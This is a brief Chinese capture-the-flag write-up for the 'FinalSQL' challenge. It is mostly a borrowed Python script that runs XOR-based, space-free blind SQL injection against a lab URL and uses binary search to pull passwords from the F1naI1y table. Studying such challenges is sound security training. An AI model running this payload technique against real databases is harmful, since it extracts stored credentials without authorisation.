[极客大挑战 2019]FinalSQL 1
首先打开题目,发现是一个sql注入:
寻找注入点发现注入点在:
发现是一个盲注,且过滤了and和空格等
并且直接盲注比较慢,还需要利用二分法来编写脚本
大佬脚本:
import requests
url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php"
flag = ''
def payload(i, j):
sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
data = {"id": sql}
r = requests.get(url, params=data)
# print (r.url)
if "Click" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1, 10000):
print(i, ':')
low = 31
high = 127
while low <= high:
mid = (low + high) // 2
res = payload(i, mid)
if res:
low = mid + 1
else:
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
exp()
print('flag=', flag)
获取flag:
参考博客: